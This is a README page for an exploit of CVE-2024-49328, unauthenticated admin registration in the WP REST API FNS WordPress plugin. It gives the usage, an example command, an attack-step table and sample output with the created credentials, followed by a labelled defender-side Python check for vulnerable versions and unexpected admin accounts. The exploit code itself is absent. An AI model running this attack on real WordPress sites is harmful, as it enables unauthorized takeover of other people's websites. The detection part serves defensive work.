## https://sploitus.com/exploit?id=0FAFB36E-FCEF-5A02-A323-06538CBEFCFE
# CVE-2024-49328-exploit

# 🌟 Description:
This script exploits a privilege escalation vulnerability in the WP REST API FNS Plugin for WordPress. The vulnerability affects all versions up to and including `1.0.0`, allowing unauthenticated attackers to gain administrator privileges.


## โš™๏ธ Usage
```bash


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        
```
Example Command:

```
python CVE-2024-49328.py -u http://targetsite.com -e admin@example.com -p password123
```
 ### ๐Ÿ” Details of Exploitation


| **Step** | **Description**                                               | **Icon**           |
|----------|---------------------------------------------------------------|--------------------|
| Step 1   | Verify the version of the plugin.            | ๐Ÿ“                 |
| Step 2   | Check if the version is exploitable (`1.0.0`,  or lower).| โœ…                 |
| Step 3   | Exploit the vulnerability and register a new admin user.      | ๐Ÿ”’             |
| Step 4   | Print the result with user credentials for verification.      | ๐ŸŽ‰                 |

## โžก๏ธ Example Output
```

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: Nxploit@admin.sa
Password: nxploit
```
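A defender-side counterpart to steps 1 and 2 and to the account shown in the example output, as an added example that is not part of the original README or the exploit script: it reads the plugin's `Stable tag` from a local copy of its readme.txt and lists administrator accounts missing from an allowlist. Assumptions: the readme text and the JSON (in the shape `wp user list --role=administrator --format=json` emits) are constructed samples, and the allowlist and function names are hypothetical.

```python
import json
import re

LAST_VULNERABLE = (1, 0, 0)  # page: affected "up to and including 1.0.0"

# Constructed sample inputs (not taken from a real site).
SAMPLE_README = "=== WP REST API FNS ===\nRequires at least: 4.0\nStable tag: 1.0.0\n"
SAMPLE_USERS = json.dumps([
    {"ID": 1, "user_login": "owner", "user_email": "owner@example.org",
     "user_registered": "2021-03-02 10:15:00", "roles": "administrator"},
    {"ID": 7, "user_login": "Nxploit@admin.sa", "user_email": "Nxploit@admin.sa",
     "user_registered": "2024-11-20 04:41:09", "roles": "administrator"},
])

def parse_version(text):
    """Turn '1.0' or '1.0.0' into a comparable tuple padded to three parts."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:3]
    return tuple(parts + [0] * (3 - len(parts)))

def stable_tag(readme_text):
    """Return the 'Stable tag' value from a plugin readme.txt, or None."""
    m = re.search(r"^[ \t]*Stable tag:[ \t]*(\S+)", readme_text, re.I | re.M)
    return m.group(1) if m else None

def is_vulnerable(readme_text):
    """True when the installed version falls in the affected range."""
    tag = stable_tag(readme_text)
    # Missing or non-numeric tag (e.g. 'trunk'): flag it for manual review.
    if tag is None or not re.match(r"\d", tag):
        return True
    return parse_version(tag) <= LAST_VULNERABLE

def unexpected_admins(users_json, allowlist):
    """Administrator accounts whose e-mail is not on the allowlist."""
    known = {e.lower() for e in allowlist}
    return [u for u in json.loads(users_json)
            if u["user_email"].lower() not in known]

if __name__ == "__main__":
    print("stable tag:", stable_tag(SAMPLE_README))
    print("in affected range:", is_vulnerable(SAMPLE_README))
    for u in unexpected_admins(SAMPLE_USERS, ["owner@example.org"]):
        print("review admin:", u["user_login"], u["user_registered"])
```
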


### Install the required packages

```
pip install requests
```



## โš ๏ธ Disclaimer
๐Ÿšจ Warning:

This script is for educational purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical.